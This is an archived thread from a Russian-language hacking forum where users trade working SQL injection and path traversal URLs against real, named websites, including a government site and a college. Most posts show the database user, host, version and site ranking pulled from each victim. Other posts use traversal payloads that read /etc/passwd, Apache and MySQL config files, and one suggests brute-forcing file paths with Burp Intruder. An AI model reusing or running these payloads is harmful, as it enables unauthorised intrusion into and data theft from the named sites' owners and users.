ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.05.2015, 18:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
1575
Репутация:
1
|
|
SQLi
Код:
Code:
akulof.ru/modules/shop/category.php?id=-26 UNION ALL SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7 --
|
|
|
|
27.05.2015, 19:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
Сообщение от None
alvora.lt/jobs.php?id=-7'%20union%20select%201,2,3,concat(user(),0x3a,dat abase(),0x3a,version())--+f
alvora_web_vart@localhost:alvora_database:5.5.39-cll-lve
Сообщение от None
volumeseattle.com/jobs.php?id=-7%20union%20select%201,concat(user(),0x3a,database (),0x3a,version())--+f
volumeseattle@184.168.27.206:volumeseattle:5.0.96-log
Сообщение от None
offestival.com/top.php?id=-2%20union%20select%201,2,concat(user(),0x3a,databa se(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18&lang=en
|
|
|
|
29.05.2015, 01:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
1213
Репутация:
5
|
|
Код:
Code:
http://zabinfo.ru/person.php?pageid=person&idperson=-266 union select 1,user(),version(),4,database(),6,7,8,9,10,11,12,13;%00
User: zabftp@localhost
Version: 5.1.48-log
Database: zia_news
ТИЦ: 2100
PR: 4
Код:
Code:
http://museumpereslavl.ru/event.php?id=-377 union select 1,group_concat(user(),0x3c62723e,version(),0x3c62723e,database()),3,4,5,6,7,8,9--+
User: u184264@10.8.3.230
Version: 5.5.35-1+wheezy1+mh1-log
Database: u184264
ТИЦ: 190
PR: 4
Код:
Code:
http://www.ukvz.ru/catalogue/view.php?id=-81' union select 1,2,3,4,group_concat(user(),0x3c62723e,version(),0x3c62723e,database()),6,7,8,9,10,11,12,13,14,15,16--+&ggid=1&flag=0
User: ukvz@localhost
Version: 5.1.73-log
Database: ukvz
ТИЦ: 100
PR: 4 |
|
|
|
29.05.2015, 02:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
782
Репутация:
2
|
|
SQLi
Код:
Code:
http://www.barryowen.com/toys.php?catID=14&subCatID=-49+union+select+1,2,3,4,5,6,7,8,9,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,11,12,13,14,15,16+--+
Код:
Code:
http://www.createwindow.com/store/crystals/index.php?CatID=-12+or+1+group+by+mid%28user%28%29,rand%280%29|0,64%29+having+avg%280%29+--+
Код:
Code:
http://wpcreek.com/products.php?catid=101+union+select+1,2,3,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,5,6,7+--+-
|
|
|
|
29.05.2015, 15:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
1213
Репутация:
5
|
|
Код:
Code:
http://www.ck-oda.gov.ua/index.php?article=-254 union select 1,concat(0x3c666f6e7420636f6c6f723d7265643e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f666f6e743e,0x3c62723e,0x557365723a,user(),0x3c62723e,0x56657273696f6e3a,version(),0x3c62723e,0x44617461626173653a,database(),0x3c62723e),3,4--+
User: oda@localhost
Version: 5.1.60
Database: oda
ТИЦ: 1200
PR: 5 |
|
|
|
29.05.2015, 17:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
6561
Репутация:
6
|
|
http://mehfilentertainment.com/even...mn_name,3,4,5+from+information_schema.colum ns
http://www.astorialic.org/events.ph...5,6,7,8,9,10+from+information_schema.t ables--
http://www.essaygifts.co.za/catalog...ame,3,4,5,6+FROM+information_schema.colu mns--
http://www.editionsdusandre.com/boo...,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1
http://www.wailana.com.au/catalog/p...,7,8,9,10,11+from+information_schema.tables--
|
|
|
|
29.05.2015, 17:51
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Большая просьба не постить по одной уязвимости в одном сообщении. Если с Вашего поста в теме никто не писал, отредактируйте. Не стоит думать, что так вы получите больше репутации
Еще совет: если это SQL, указывайте версию. Иногда пригождается проверить работу какого-либо вектора. Также, не забывайте обрамлять тегами CODE
|
|
|
31.05.2015, 00:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Что-то я пока ничего не придумал, что с ним делать
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//ankontr.if.ua/?a_id=6395&page=../../../../../../../../../../etc/passwd%00&type=info[/COLOR][/COLOR]
|
|
|
|
31.05.2015, 01:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
35015
Репутация:
57
|
|
Сосдай пейлоад с возможными путями /threads/324564/ и пройтись Burp Suite в Intruder-e
Вот конфиг апача
Код:
Code:
http://ankontr.if.ua/?a_id=6395&page=../../../../../etc/apache2/apache2.conf%00
MySQL
Код:
Code:
http://ankontr.if.ua/?a_id=6395&page=../../../../../%2fetc%2fmysql%2fmy.cnf%00
|
|
|
|
31.05.2015, 02:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
1213
Репутация:
5
|
|
Код:
Code:
http://www.keuka.edu/apps/m_directory/person.php
?id=-890' union select 1,2,concat(0x3c666f6e742020636f6c6f723d227265642220666163653d2247656f72676961223e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f666f6e743e3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),4,5,6,7,8,9,10,11,12--+
User: keukawe_www@localhost
Version: 5.1.72-ius
Database: keukawe_directory 6 7
ТИЦ: 10
PR: 6 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
